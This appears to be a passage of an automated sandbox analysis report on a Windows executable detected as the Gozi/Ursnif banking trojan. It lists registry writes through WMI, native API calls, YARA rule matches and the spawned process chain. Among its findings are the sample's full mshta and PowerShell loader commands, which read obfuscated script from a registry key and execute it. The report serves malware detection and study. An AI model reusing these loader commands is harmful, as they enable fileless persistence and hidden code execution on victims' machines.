                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Writes registry values via WMI
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: C:\Users\user\Desktop\main.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                Source: main.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
                Source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2620, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D82FC
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D2DCC
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D2792
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401F78 NtMapViewOfSection,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D737C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D8521 NtQueryVirtualMemory,
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: main.exeVirustotal: Detection: 61%
                Source: main.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\main.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\main.exe C:\Users\user\Desktop\main.exe
                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmpv3qo3.pur.ps1Jump to behavior
                Source: classification engineClassification label: mal100.troj.winEXE@5/2@3/1
                Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D7256 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                Source: C:\Users\user\Desktop\main.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\main.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006DB859 push 0000006Fh; retf
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D82EB push ecx; ret
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D7F00 push ecx; ret
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,

                Hooking and other Techniques for Hiding and Protection

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
